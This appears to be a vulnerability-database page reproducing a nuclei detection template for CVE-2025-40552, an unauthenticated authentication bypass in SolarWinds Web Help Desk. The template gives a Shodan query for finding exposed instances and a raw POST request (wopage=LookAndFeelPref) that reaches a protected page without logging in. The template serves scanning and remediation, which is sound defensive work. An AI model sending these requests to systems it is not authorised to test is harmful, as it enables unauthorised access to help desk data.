Lucene search
K

SolarWinds Web Help Desk - Authentication Bypass

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

SolarWinds Web Help Desk has a critical authentication bypass allowing unauthenticated actions; update to latest version.

Related
Refs
Code
id: CVE-2025-40552

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions.
  impact: |
    Attackers can execute protected actions without authentication, potentially compromising system integrity and data security.
  remediation: Update to the latest version of SolarWinds Web Help Desk.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40552
    cwe-id: CWE-1390
    epss-score: 0.49734
    epss-percentile: 0.98755
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:"1895809524"
  tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'helpdesk','WebObjects')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1
        Host: {{Hostname}}

        wopage=LookAndFeelPref

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '<span>Add File</span>','saveOptions')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100b8d7b25f37c9e290ca4c229ae0da223399aa29358758130ed1a35f9af14cf687022100b0aa26f6f55f3ea457f52c542451be147111c71fdba5c0207fea9602d76e6cfd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Feb 2026 03:39Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.6039
SSVC
10